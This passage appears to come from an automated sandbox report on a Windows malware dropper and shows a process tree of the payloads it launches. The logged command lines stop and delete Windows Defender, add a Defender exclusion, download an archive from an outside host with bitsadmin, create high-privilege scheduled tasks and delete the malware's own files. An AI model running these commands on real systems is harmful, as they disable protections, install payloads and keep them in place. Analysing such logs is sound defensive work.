                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe"
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:2792
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:14328
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet
                                                                                                                                                                                  13⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:17176
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"
                                                                                                                                                                                    14⤵
                                                                                                                                                                                      PID:8656
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:16968
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:17256
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 17256 -s 204
                                                                                                                                                                                          14⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          PID:3220
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:17076
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                          13⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          PID:17296
                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:9432
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe & exit
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:17168
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:6900
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe & exit
                                                                                                                                                                                              12⤵
                                                                                                                                                                                                PID:17320
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:1404
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:5432
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 5432 & erase C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe & RD /S /Q C:\\ProgramData\\248117682026473\\* & exit
                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                          PID:8492
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /pid 5432
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:8924
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:5676
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com
                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                            PID:2264
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:10052
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:12432
                                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" stop WinDefend
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                      PID:12488
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:12536
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        PID:12560
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:12612
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe & exit
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                    PID:16924
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe
                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                        PID:6828
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive
                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 276
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                            PID:6260
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S & exit
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                          PID:7492
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S
                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            PID:3372
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                PID:5820
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                  PID:10072
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:10636
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                      PID:10868
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                        PID:11072
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:11292
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                          • Checks for any installed AV software in registry
                                                                                                                                                                                                                                          PID:11532
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                          "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                          PID:11756
                                                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfT5WYVqWlNx1lAe -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pSEpyyqJOWlXpayv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:6496
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                              PID:8700
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:9060
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:9732
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                    PID:17108
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:10040
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui
                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                        PID:9380
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui
                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          PID:3132
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:10612
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                            PID:4696
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                              PID:11224
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                PID:8856
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                  PID:11676
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                    PID:9400
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                  PID:5884
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                      PID:7736
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe" silent
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:6380
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:3992
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:6440
                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:1464
                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:1912
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:5588
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 276
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                              PID:5424
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:6024
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:5496
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 236
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                              PID:1964
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:5312
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:5724
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:5144
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Windows security modification
                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • System policy modification
                                                                                                                                                                                                                                                              PID:6304
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:6776
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:6692
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:5124
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:5432
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
